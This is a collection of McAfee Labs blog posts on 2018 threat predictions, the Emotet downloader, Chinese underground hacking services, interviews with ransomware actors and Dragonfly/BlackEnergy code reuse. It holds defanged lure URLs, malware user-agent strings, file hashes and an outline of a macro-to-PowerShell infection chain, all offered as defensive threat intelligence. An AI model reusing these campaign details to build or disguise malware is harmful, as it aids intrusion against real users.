The rapid growth and damaging effects of new cyberthreats demand defenses that can detect new threats at machine speeds, increasing the emphasis on machine learning as a valuable security component. Unfortunately, machines will work for anyone, fueling an arms race in machine-supported actions from defenders and attackers. Human-machine teaming has tremendous potential to swing the advantage back to the defenders, and our job during the next few years is to make that happen. To do that, we will have to protect machine detection and correction models from disruption, while continuing to advance our defensive capabilities faster than our adversaries can ramp up their attacks.

Ransomware Pivots to New Targets, New Objectives
The profitability of traditional ransomware campaigns will decline as vendor defenses, user education, and industry strategies improve to counter them. Attackers will target less traditional, more profitable ransomware targets, including high net-worth individuals, connected devices, and businesses. This pivot from the traditional will see ransomware technologies applied beyond the objective of extorting individuals, to cyber sabotage and disruption of organizations. The drive among adversaries for greater damage, disruption, and the threat of greater financial impact will not only spawn new variations of cybercrime “business models,” but also begin to seriously drive the expansion of the cyber insurance market.

Serverless Apps: New Opportunities for Friend and Foe
Serverless apps can save time and reduce costs, but they can also increase the attack surface by introducing privilege escalation, application dependencies, and the vulnerable transfer of data across networks. Serverless apps enable greater granularity, such as faster billing for services. But they are vulnerable to attacks exploiting privilege escalation and application dependencies. They are also vulnerable to attacks on data in transit across a network. Function development and deployment processes must include the necessary security processes, and traffic that is appropriately protected by VPNs or encryption.

When Your Home Becomes the Ultimate Storefront
As connected devices fill your house, companies will have powerful incentives to observe what you are doing in your home, and probably learn more than you want to share. In 2018, McAfee predicts more examples of corporations exploring new ways to capture that data. They will consider the fines of getting caught to be the cost of doing business, and change the terms and conditions on your product or service to cover their lapses and liabilities. It is more difficult to protect yourself from these issues, and the next year will see a significant increase in breaches and discoveries of corporate malfeasance.

Inside Your Child’s Digital Backpack
Perhaps the most vulnerable in this changing world are our children. Although they face an amazing future of gadgets, services, and experiences, they also face tremendous risks to their privacy. We need to teach them how to pack their digital backpacks so that they can make the most of this future. The world is becoming very public, and though many of us seem to be OK with that, the consequences of an ill-considered post or thoughtless online activity can be life altering for years to come.

The Adversarial Machine Learning Arms Race Revs Up

Attackers and defenders work to out-innovate each other in AI

Human-machine teaming is becoming an essential part of cybersecurity, augmenting human judgment and decision making with machine speed and pattern recognition. Machine learning is already making significant contributions to security, helping to detect and correct vulnerabilities, identify suspicious behavior, and contain zero-day attacks.

During the next year, we predict an arms race. Adversaries will increase their use of machine learning to create attacks, experiment with combinations of machine learning and artificial intelligence (AI), and expand their efforts to discover and disrupt the machine learning models used by defenders. At some point during the year, we expect that researchers will reverse engineer an attack and show that it was driven by some form of machine learning. We already see black-box attacks that search for vulnerabilities and do not follow any previous model, making them difficult to detect. Attackers will increase their use of these tools, combining them in novel ways with each other and with their attack methods. Machine learning could help improve their social engineering—making phishing attacks more difficult to recognize—by harvesting and synthesizing more data than a human can. Or increase the effectiveness of using weak or stolen credentials on the growing number of connected devices. Or help attackers scan for vulnerabilities, boosting the speed of attacks and shortening the time from discovery to exploitation.

Whenever defenders come out with something new, the attackers try to learn as much about it as possible. Adversaries have been doing this for years with malware signatures and reputation systems, for example, and we expect them to do the same with the machine learning models. This will be a combination of probing from the outside to map the model, reading published research and public domain material, or trying to exploit an insider. The goal is evasion or poisoning. Once attackers think they have a reasonable recreation of a model, they will work to get past it, or to damage the model so that either their malware gets through or nothing gets through and the model is worthless.

On the defenders’ side, we will also combine machine learning, AI, and game theory to probe for vulnerabilities in both our software and the systems we protect, to plug holes before criminals can exploit them. Think of this as the next step beyond penetration testing, using the vast capacity and unique insights of machines to seek bugs and other exploitable weaknesses.

Because adversaries will attack the models, defenders will respond with layers of models—operating independently—at the endpoint, in the cloud, and in the data center. Each model has access to different inputs and is trained on different data sets, providing overlapping protections. Speaking of data, one of the biggest challenges in creating machine learning models is gathering data that is relevant and representative of the rapidly changing malware environment. We expect to see more progress in this area in the coming year, as researchers gain more experience with data sets and learn the effects of old or bad data, resulting in improved training methods and sensitivity testing.

The machines are rising. They will work with whoever feeds them data, connectivity, and electricity. Our job is to advance their capabilities faster than the attackers, and to protect our models from discovery and disruption. Working together, human-machine teaming shows great potential to swing the advantage back to the defenders.

Ransomware Pivots to New Targets, New Objectives

Swings from the traditional to new targets, technologies, tactics, and business models

McAfee sees an evolution in the nature and application of ransomware, one that we expect to continue through 2018 and beyond.

The good news about traditional ransomware. McAfee Labs saw total ransomware grow 56% over the past four quarters, but evidence from McAfee Advanced Threat Research indicates that the number of ransomware payments has declined over the last year.

Our researchers assert that the trend suggests a greater degree of success during the last 12 months by improved system backup efforts, free decryption tools, greater user and organizational awareness, and the collaborative actions of industry alliances such as NoMoreRansom.org and the Cyber Threat Alliance.

How cybercriminals are adjusting. These successes are forcing attackers to pivot to high-value ransomware targets, such as victims with the capacity to pay greater sums, and new devices lacking comparable vendor, industry, and educational action.

Targeting higher net-worth victims will continue the trend toward attacks that are more personal, using more sophisticated exploitation of social engineering techniques that deliver ransomware via spear phishing messages. These high-value targets will be attacked at their high-value endpoints, such as their increasingly expensive personal devices, including the latest generation of smart phones. Cloud backups on these devices have made them relatively free from traditional ransomware attacks. McAfee predicts that attackers will instead try to “brick” the phones, making them unusable unless a ransom payment is sent to restore them.

McAfee believes this pivot from the traditional is reflected in the slight decline in the number of overall ransomware families, as criminals shift to a smaller number of higher-value technologies and tactics, more talented purveyors of techniques, and more specialized, more capable ransomware-as-a-service providers.

New ransomware families discovered in 2017. On average, 20%‒30% per month of new samples are based on Hidden Tear ransomware code. Source: McAfee Labs.

The less sophisticated, mostly well-known, mostly predictable, one-to-many technology, tactics, and providers are simply failing to deliver the rewards to justify the investments, even modest ones.

If well-understood ransomware families survive and thrive, McAfee believes they will do so in the hands of trusted service providers that continue to establish themselves with more established, sophisticated backends, as is currently the case with the Locky family.

Where the digital impacts the physical. Every year, we read predictions about threats to our physical safety from security breaches of industrial systems in transportation, water, and power. We are also perennially entertained with creative depictions of physical threats brought about by the imminent hacking rampage of consumer devices, from the car to the coffeemaker.

McAfee resists the temptation to join the cybersecurity-vendor chorus line to warn you of the danger that lurks within your vacuum cleaner. But our researchers do foresee digital attacks impacting the physical world. Cybercriminals have an incentive to place ransomware on connected devices providing a high-value service or function to high-value individuals and organizations.

Rather than seize control of your grandmother’s automobile brakes as she drives along a winding mountain road, our researchers believe it more likely and more profitable for cybercriminals to apply ransomware to an important business executive’s car, preventing them from driving to work. We believe it more likely and more profitable for cybercriminals to place ransomware on a wealthy family’s thermostat in the dead of winter, than to set the homes of millions ablaze through their coffeemakers.

In these and other ways, we believe cybercriminals will see greater return in orchestrating digital attacks that physically impact individuals for profit, rather than fatal damage.

Beyond extortion to disruption and destruction. The WannaCry and NotPetya ransomware outbreaks foreshadow a trend of ransomware being applied in new ways, in pursuit of new objectives, becoming less about traditional ransomware extortion and more about outright system sabotage, disruption, and damage.

The WannaCry and NotPetya campaigns quickly infected large numbers of systems with ransomware, but without the payment or decryption capabilities necessary to unlock impacted systems. Although the exact objectives are still unclear, McAfee believes the attackers could have sought to blatantly disrupt or destroy huge networks of computers, or disrupt and distract IT security teams from identifying other attacks, in much the same way DDoS attacks have been used to obscure other real aspects of attacks. It is also possible that they represented spectacular proofs of concept, demonstrating their disruptive and destructive power, intending to engage large organizations with mega-extortion demands in the future.

In 2018, McAfee expects to see ransomware used in the manner of WannaCry and NotPetya. Ransomware-as-a-service providers will make such attacks available to countries, corporations, and other nonstate actors seeking to paralyze national, political, and business rivals in much the same way that NotPetya attackers knocked global IT systems out of commission at corporations around the world. We expect an increase in attacks intended to cause damage, whether by unscrupulous competitors or by criminals trying to mimic a mafia-style protection racket in cyber form.

Although this weaponization of ransomware at first seems to stretch the definition of the technology and tactical concept, consider the incentive of avoiding a WannaCry or NotPetya specific to your organization, complete with rapid, wormlike propagation and a demonstration of material disruption and damage, but with a demand for payment to make it all stop.

Of course, this raises the biggest, unavoidable ransomware question of 2017: Were WannaCry and NotPetya actually ransomware campaigns that failed in their objectives to make significant revenue? Or perhaps incredibly successful wiper campaigns?

Finally, McAfee predicts that these shifts in the nature and objectives of ransomware attacks, and their potential for real material financial impacts, will create an opportunity for insurance companies to extend their digital offerings with a range of ransomware insurance.

Serverless Apps: New Opportunities for Friend and Foe

This section was updated on December 11th.

Serverless apps attempt to match the security of a container or virtual machine

“Serverless” apps, the latest aspect of virtual computing, enable a new degree of abstraction in application development, by leveraging Functions as a Service (FaaS) for their computation requirements. Functions are billed only while they are executing, including sub-second billing (AWS Lambda charges per 100ms). Paying only for executing business logic, as opposed to running a full container or a virtual machine, can reduce costs by a factor of 10 for some operations. But what about the security of these function calls? They are vulnerable in traditional ways, such as privilege escalation and application dependencies, but also in new ways, such as traffic in transit and an increased attack surface.

Let’s start with the traditional vulnerabilities. Serverless apps that are quickly implemented or rapidly deployed can use an inappropriate privilege level, leaving the environment open to a privilege escalation attack. Achieving least privilege is more difficult with more components to protect, contain, and update. Similarly, the speed of deployment can result in a function depending on packages pulled from external repositories that are not under the organization’s control and have not been properly evaluated.

Then there are the new risks. Because serverless apps naturally scale and bill based on traffic, distributed denial of service attacks can more easily translate directly to the bottom line, depending on the number of simultaneous executions allowed by the application.

Another risk is data that may be leveraged by multiple functions to process a business transaction. Because a serverless application may include more components than prior application architectures, the data may be at more risk of interception or manipulation. Comprehensive and ubiquitous use of authentication and authorization between services and encryption of data both at rest and in transit should be leveraged.

We predict the increased granularity of serverless apps will lead to a comparable increase in the attack surface. More functions, transiting to one or more providers, means more area for an attacker to exploit or disrupt. Make sure your function development and deployment process includes the necessary security steps, and that traffic is appropriately protected by VPNs or encryption.

When Your Home Becomes the Ultimate Storefront

Without controls, you might surrender your privacy to corporate marketers

Corporate marketers have powerful incentives to observe and understand the buying needs and preferences of connected home device owners. Networked devices already transmit a significant amount of information without the knowledge of the overwhelming majority of consumers. Customers rarely read privacy agreements, and, knowing this, corporations are likely to be tempted to frequently change them after the devices and services are deployed to capture more information and monetize it.

In 2018, connected home device manufacturers and service providers will seek to overcome thin operating margins by gathering more of our personal data—with or without our agreement—as we practically surrender the home to become a corporate virtual store front.

With such dynamics in play, and with the technical capabilities already available to device makers, corporations could offer discounts on devices and services in return for the ability to monitor consumer behavior at the most personal level.

Rooms, devices, and apps are easily equipped with sensors and controls capable enough to inform corporate partners of the condition of home appliances, and bombard consumers with special upgrade and replacement offers.

It is already possible for children’s toys to monitor their behavior and suggest new toys and games for them, including upgrades for brand-name content subscriptions and online educational programs.

It is already possible for car manufacturers and their service centers to know the location of specific cars, and coordinate with owners calendars and personal assistants to manage and assist in the planning of their commutes. Coffee, food, and shopping stops could automatically be integrated into their schedules, based on their preferences and special offers from favorite food and beverage brands.

Whether this strikes you as a utopia for consumers and marketers, or a dystopian nightmare for privacy advocates, many aspects of these scenarios are close to reality.

Data collection from the current wide range of consumer devices and services is running far ahead of what most people believe.

Although there is certainly a legal argument that consumers have agreed to the collection of their data, even those of us technically knowledgeable to know this is taking place do not read the contracts that we agree to, and some corporations might change them after the fact or go beyond what they promise.

We have seen numerous examples of corporate malfeasance in recent years. A flashlight app developer’s license agreement did not disclose that the app gathered geolocation data. Three years ago, a video game hardware company pushed an update with no option to refuse; users had to agree to new terms or stop using the product they had purchased. In many agreements, users “agree” to all future changes that the company makes unilaterally to the terms: “Continued use of the service after any such changes shall constitute your consent to such changes.”

In July, the US Federal Bureau of Investigation warned parents to be wary of connected children’s toys that could be capable of collecting their children’s personally identifiable information.

Businesses will continue to seek to understand what and how consumers consume in the privacy of their homes, certainly requiring more user data than consumers will likely be comfortable sharing. McAfee asserts that a substantial number of corporations will break privacy laws, pay fines, and still continue such practices, thinking they can do so profitably. But the FBI’s recent toy warning to parents might suggest that such approaches could result in regulatory and even criminal legal consequences.

Next year will provide new examples of how well, and how badly, corporations are able to navigate the temptations and opportunities presented by connected homes.

We thank the Electronic Frontier Foundation for their assistance with this article.

Inside Your Child’s Digital Backpack

Protecting your children from corporate abuse of their user-generated content

It seems that every product, service, or experience we interact with today creates some type of digital record, whether or not we like it. As adults, we are gradually coming to terms with this effect and learning to manage our digital lives, but what about our children? Employers are already making hiring decisions influenced by search results. Could this extend to schools, health care, and governments? Will children be denied entry to a school because of how much time they spent binge-watching videos, or find it difficult to run for office because of a video made when they were seven?

Online information, or digital baggage, can be positive, negative, or neutral. As our children go on their increasingly digital journey through life, what are they packing for their trip? Likely, it will be a combination of mostly innocuous and trivial things, some positive and amazing ones that will help them on their journey, and some negative items that could weigh them down. Unfortunately, we predict that many future adults will suffer from negative digital baggage, even if it comes about without their intention.

As parents, our challenge is to help our children navigate this new world, in which they can be tracked almost from the moment of conception. Remember that story from 2012 about a girl who received coupons from a retailer for pregnancy-related items before she acknowledged that she was pregnant?

To help our children, we need to understand the kinds of digital artifacts that are being captured and stored. There are generally three types: explicit, implicit, and inadvertent.

Explicit content is all of those things that happen after you click the “I Agree” button on the terms and conditions or end user license agreement. Given recent breaches, it seems that anything stored online will at some point be hacked, so why not assume that from the beginning? If they really want to, a prospective employer may be able to find out what content you created, your social habits, and a host of other data points. This is an area that parents (at least initially) have a lot of control and influence over, and can teach and model good habits. Are you buying “M”-rated games for your 10-year-old, or letting your teens post videos without some oversight? Sadly, what happens online is not private, and there could eventually be consequences.

Implicit content is anything you do or say in an otherwise public place, which could be photographed, recorded, or somehow documented. This ranges from acting silly to drinking or taking drugs, but also includes what people say, post, tweet, etc. in public or online. We do not think that childlike behavior (by children) is going to be frequently or successfully used against people in the future, so we can still let our kids be kids.

Inadvertent content is the danger area. These are items that were intended to remain private, or were never expected to be captured. Unfortunately, inadvertent content is becoming increasingly common, as organizations of all types (accidentally or on purpose) bend and break their own privacy agreements in a quest to capture more about us. Whether with a toy, a tablet, a TV, a home speaker, or some other device, someone is capturing your child’s words and actions and sending them to the cloud. This is the most challenging part of the digital journey, and one that we must manage vigilantly. Pay attention to what you buy and install, turn off unnecessary features, and change the default passwords to something much stronger!

Our children face an amazing potential future, full of wonderful gadgets, supportive services, and amazing experiences. Let’s teach them at home to pack their digital backpacks so that they can make the most of it.

In the corporate world, McAfee predicts that the May 2018 implementation of the European Union’s General Data Protection Regulation (GDPR) could play an important role in setting ground rules on the handling of both consumer data and user-generated content in the years to come. The new regulatory regime impacts companies that either have a business presence in EU countries, or process the personal data of EU residents, meaning that companies from around the world will be compelled to adjust the way in which they process, store, and protect customers’ personal data. Forward-looking businesses can leverage this to set best practices that benefit customers using consumer appliances, content-generating app platforms, and the online cloud-based services behind them.

In this regard, the year 2018 may well best be remembered for whether consumers truly have the right to be forgotten.

To find out more about the data protection opportunity for businesses, visit McAfee’s GDPR site.

For more on how to protect your children from potential user-generated content abuse and other digital threats, please see McAfee’s blogs for guidance on parenting in the digital age.

Contributors

• Christiaan Beek
• Lisa Depew
• Magi Diego
• Daren Dunkel
• Celeste Fralick
• Paula Greve
• Lynda Grindstaff
• Steve Grobman
• Kenneth Howard
• Abhishek Karnik
• Sherin Mathews
• Jesse Michael
• Raj Samani
• Mickey Shkatov
• Dan Sommer
• Vincent Weafer
• Eric Wuehler
• Jonathan King

About McAfee Labs

McAfee Labs is one of the world’s leading sources for threat research, threat intelligence, and cybersecurity thought leadership. With data from millions of sensors across key threats vectors—file, web, message, and network—McAfee Labs delivers real-time threat intelligence, critical analysis, and expert thinking to improve protection and reduce risks.

To learn more about our predictions for 2018, register for our January 9th webcast.

The post ‘McAfee Labs 2018 Threats Predictions Report’ Previews Five Cybersecurity Trends appeared first on McAfee Blogs.

During the past couple of days, we have seen an increase in activity from Emotet. This Trojan downloader spreads by emails that lure victims into downloading a Word document, which contains macros that after executing employ PowerShell to download a malicious payload.

We have observed Emotet downloading a variety of payloads, including ransomware, Dridex, Trickbot, Pinkslipbot, and other banking Trojans.

During a wave of attacks in early December we discovered a campaign spreading the ransomware family HydraCrypt. The sample we received had a compilation date of December 5.

The initial Word documents were downloaded from a number of URLs; some examples follow:

• hxxp://URL/DOC/Invoice/
• hxxp://URL/scan/New-invoice-[Number]/
• hxxp://URL /scan/New-invoice- Number]/
• hxxp://URL /LLC/New-invoice- Number]/

The document topics are crafted to entice users to open them because they appear to impact our finances or official documentation.

• Invoice
• Paypal
• Rechnung (with or without a number)
• Dokumente vom Notar

The documents have typical characteristics used by Emotet attackers. When a user opens the document, it claims the file is protected and asks the victim to enable the content, which launches the code hidden in the macros.

In analyzing the macros, we see heavily obfuscated code to make detection difficult and cover up the real purpose of the document:

The macro code uses a mix of command, wmic, and PowerShell to copy itself to disk, create a service, and contact its control server for a download URL.

Emotet collects information about the victim’s computer, for example running processes, and sends encrypted data to the control server using a POST request:

The specific user-agent strings used in these requests:

• Mozilla/4.0(compatible;MSIE7.0;WindowsNT6.1;Trident/4.0;SLCC2;.NETCLR2.0.50727;
  .NETCLR3.5.30729;.NETCLR3.0.30729;MediaCenterPC6.0;.NET4.0C;.NET4.0E)
• Mozilla/4.0(compatible;MSIE7.0;WindowsNT6.1;Trident/4.0;SLCC2;.NETCLR2.0.50727;
  .NETCLR3.5.30729;.NETCLR3.0.30729;MediaCenterPC6.0;InfoPath.3)
• Mozilla/5.0(WindowsNT6.1;WOW64;rv:39.0)Gecko/20100101Firefox/38.0•Mozilla/5.0
  (compatible;MSIE8.0;WindowsNT5.1;SLCC1;.NETCLR1.1.4322)

The payload samples are downloaded to %Windir%\System32 using a random name, either in GUID format or a five-digit random name.

The control servers and URLs hosting the malicious documents are covered within McAfee Global Threat Intelligence, with which we provide coverage for the samples detected. The McAfee Advanced Threat Research team proactively monitors any new developments regarding Emotet.

Detection

The new variants of Emotet are detected by McAfee DAT files as Emotet-FEJ!<Partial Hash> since December 3. Real Protection technology within McAfee Endpoint Security Adaptive Threat Protection provides zero-day detection of these new variants as Real Protect-SS!<Partial Hash>.

The post Emotet Downloader Trojan Returns in Force appeared first on McAfee Blogs.

Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

Operating Structure

The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Contrary to their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that there has been an increasing number of organized crime groups that take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.

Master-Apprentice Mechanism

Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members.  Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

Training program offered by an underground hacker.

Products

The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

• DDoS services
• Black-hat training
• Malware sales
• Advanced persistent attack services
• Exploit toolkits sales
• Source-code writing services
• Website hacking services
• Spam and flooding services
• Traffic sales
• Phishing website sales
• Database hacking services

Buying Hacking Services and Malware

Some hacking groups provide 24/7 technical support and customer service for customers who do not have a technical background. A hacking demonstration is also available upon request. Prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay.  However, prospective customers are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire will request payment on the remaining balance.

Steps in the hacking service transaction process:

• Negotiating price
• Making a deposit
• Demonstration (if requested)
• Beginning the hacking services
• Paying the balance

Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

Steps in the malware purchase transaction process:

• Negotiating price
• Paying in full for malware
• Receiving product or exploit kit

Conclusion

The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command, and by setting master-and-apprentice relationships to expand their business operations.  They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.

Follow all our research and stories like these on Twitter at @McAfee_Labs.

The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.

In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second?

One major trend that continues in Q3 is the abuse of Microsoft Office–related exploits and the use of malicious code in macros that activates PowerShell to execute them, so-called fileless attacks.

In March, an exploit was released that took advantage of CVE-2017-0199, a vulnerability in how Microsoft Office and WordPad handle specially crafted files that could result in remote code execution. During Q3, we saw an increase in the number of crafted files that were submitted. We also noticed that many releases take advantage of a toolkit on GitHub that makes it quite easy to create a “backdoor” attack:

Another major event in Q3 was a massive spam campaign to distribute a new version of the infamous Locky ransomware “Lukitus.” Within 24 hours, more than 23 million emails were sent. Shortly after the first arrived, security company Comodo Labs discovered another campaign related to this attack that sent more than 62,000 spam emails distributing the ransomware.

With banking Trojans, we observed the greatest activity from the Trickbot Trojan. We saw several variations in which the actors added new features to their code, for example, cryptocurrency stealing, embedding the EternalBlue exploit, and employing different ways of delivering the malware, which primarily targets the financial sector.

Another banking Trojan family that appeared often during the quarter was Emotet. In several spamming campaigns users were asked to download a Microsoft Word document from several locations. From our analysis of the attached document, we found the payload was hidden in the macros that used PowerShell to install the Trojan.

These major campaigns and others caused a tsunami of spam email, distributing a tremendous number of samples that increased the malware storage demands of all of us in the security industry.

For more details and our usual statistics on malware, breach incidents, and web and network threats, read the McAfee Labs Threats Report, December 2017.

The post McAfee Labs Reports All-Time Highs for Malware in Latest Count appeared first on McAfee Blogs.

During the preparations for our keynotes at McAfee’s recent MPOWER conference, we brainstormed a few topics we wanted to share with the audience. Ransomware was definitely on our agenda, but so much has already been said and written on the subject. What could we add that would be interesting?

We hit on the angle: to dive into this shady world and learn about the people behind these campaigns. There are several ways to approach this. We could go into forums and look for the individuals who discuss these campaigns or offer ransomware for sale. But that would be very time consuming and the chance of finding the right individuals would be small. There is a better way.

In most samples of ransomware, once they malware executes and files are encrypted, the “ransom note” appears. Either a background drop or a text file contains the details. During 2017 we saw many of these notes contain an email address for questions or for payment details and releasing files.

Example:

We looked at three months of unique ransomware samples and extracted either the images or the notes that contained the contact addresses. As new ransomware families popped up in our tracker, we verified them and added the addresses—because these fresh attacks made it likely the authors would interact with us.

But how could convince the actors to answer our questions? We took the role of students working on a master thesis and asked the actors if they would be willing to answer a few questions. For a couple of weeks we lived the role of students, eating lots of pizza, drinking sodas, and so on. (You have to live the role, right?)

We sent our emails and queried the actors who responded. One of our first observations was that of all the emails we retrieved, about 30 percent were either fake or nonexistent. So in these cases when files were encrypted and the victim decided to pay, using email to send evidence of payment was useless. The money was gone (as well as the files).

During the first week of our research we received answers back from some of the actors, but most were not willing to cooperate. That’s no surprise: They were cautious about revealing their identity.

During the second week, we had better luck and started to chat with a few. That number grew, and after a few weeks we had a great collection of conversations with the actors.

“Fast, easy, and safe”

When we asked why they started a career in ransomware, most answered with variations on “enough money” and “fast, easy, and safe,” especially when using anonymous email services and cryptocurrency for payments.

Homemade vs. Off the Shelf

Most of the actors we spoke with wrote their own ransomware. They had looked at the published source code but were clever enough to come up with their own variants that contained new techniques or different approaches to keep detections low. The longer they stayed out of sight of endpoint security solutions, the longer was their opportunity to make money.

Spending Their Ill-Gotten Gains

They spend the revenue they gained from their campaigns in various manners: travel, cars. One had many affiliates working for him so he was soon going to buy a house. One of the most surprising answers was that one turned to ransomware to “pay off his debts.”

Willing to Negotiate

Although they often have the image of being ruthless, almost all of them claimed a willingness to negotiate the ransom price in case victims could not afford to pay the demanded amount.

Tracking the Authors

One of the actors so enthusiastic he wanted to sell us ransomware code so we could pay off our college debts. Based on his answers and sharing of information, we noticed that he was not a very experienced actor and he gave clues on his whereabouts. In one of the conversations, he shared some examples, but the data was not scrubbed. By correlating the data he provided with other information, such as email time zones and mistakes in his English, we traced him to Dakar, Senegal. He not only sends ransomware but also sells botnets and other fraud-related services.

We found the research eye opening. Now we just need a few weeks in the gym to work off all the sodas and pizzas.

For those suffering from a ransomware attack, you have three options. The first two are bad: lose your files, or pay the ransom and hope (with no guarantee) for a key to unlock your files. The best option is to start with a visit to NoMoreRansom.org to see if a decryption tool is available.

Meanwhile, remember the standard advice on reducing your risk of picking up ransomware: Keep your OS, security, and application software up to date; exercise a healthy dose of skepticism even when you see messages that appear to come from legitimate sources; and do not click on links or open files from unknown names or organizations.

Learn more about the threat statistics we gathered in Q3, including ransomware in the McAfee Labs Threats Report, December 2017 and follow the team on Twitter at @McAfee_Labs.

The post Looking Into the World of Ransomware Actors Reveals Some Surprises appeared first on McAfee Blogs.

On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014.

Moving beyond our 2014 analysis of Dragonfly, our current focus looks at the attack’s indicators to determine whether we can glean any further information regarding the source and possible motivations of those behind the campaign. The campaign targets energy companies around the world by leveraging spear-phishing emails that, once successful, allow the attackers to download Trojan software. The Trojans provide access to the victims’ systems and networks.

Going Beyond Energy

Although initial reports showed Dragonfly attacks targeting the energy sector, investigations by McAfee Labs and the Advanced Threat Research team uncovered related attacks targeting the pharmaceutical, financial, and accounting industries. Everything about this campaign points to a well-prepared assault that carefully considers each target, and conducts reconnaissance before taking any measures to exploit compromised targets.

We saw the group use several techniques to get a foothold in victims’ networks, including spear phishing, watering holes, and exploits of supply-chain technologies via previous campaigns. By compromising well-established software vulnerabilities and embedding within them “backdoor” malware, the victims think they are installing software from a trusted vendor, while unaware of the supply-side compromise.

Once the attackers have a foothold, they create or gain user accounts to operate stealthily. Using the remote-desktop protocol to hop among internal or external systems, they connect either to a control server if the risk is minimal or use an internal compromised server to conduct operations.

The last wave of attacks used several backdoors and utilities. In analyzing the samples, we compared these with McAfee’s threat intelligence knowledge base of attack artifacts.

One of the starting points was a Trojan in the 2017 campaign with the following hashes:

• MD5: da9d8c78efe0c6c8be70e6b857400fb1
• SHA-256: fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9

Comparing this code, we discovered another sample from the group that was used in a July 2013 attack:

• MD5: 4bfdda1a5f21d56afdc2060b9ce5a170
• SHA-256: 07bd08b07de611b2940e886f453872aa8d9b01f9d3c61d872d6cfe8cde3b50d4
• Filename: fl.exe

The file was downloaded after a Java exploit executed on the victim’s machine, according to the 2013 attack report. After analyzing the 2013 sample, we noticed that some of the executable’s resources were in Russian.

Comparing the code, we find the 2017 sample has a large percentage of the same code as the backdoor used in the 2013 attacks. Further, some code in the 2017 backdoor is identical to code in the application TeamViewer, a legitimate remote administration tool used by many around the world. By incorporating the code and in-memory execution, the attackers avoid detection and leave no trace on disk.

The correlating hash we discovered that contained the same TeamViewer code was reported by Crysys, a Hungarian security company. In their report on about ‘“TeamSpy,” they mentioned the hash we correlated as well: 708ceccae2c27e32637fd29451aef4a5. This particular sample had the following compile date details: 2011:09:07 – 09:27:58+01:00

The TeamSpy attacks were originally aimed at political and human right activists living in the Commonwealth of Independent States (the former Soviet Union) and eastern European countries. Although the report attributes the attacks to a threat actor or actors and shared tactics and procedures, the motivations behind TeamSpy appear similar to those of the Dragonfly group. With identical code reuse, could the TeamSpy campaign be the work of Dragonfly?

But that’s not all of interest. We also discovered that the 2017 sample contained code blocks associated with another interesting malware family: BlackEnergy. Let’s look at an example of the code similarities we discovered:

A BlackEnergy sample from 2016 (at left) alongside a Dragonfly sample from 2017.

Self-deleting code is very common in malware, but it is usually implemented by creating a batch file and executing the batch instead of directly calling the delete command, as we see in the preceding examples.

The BlackEnergy sample used in our comparison was captured in the Ukraine on October 31, 2015, and was mentioned in our post on the evolution of the BlackEnergy Trojan. It is remarkable that this piece of code is almost identical in both samples, and suggests a correlation between the BlackEnergy and Dragonfly campaigns.

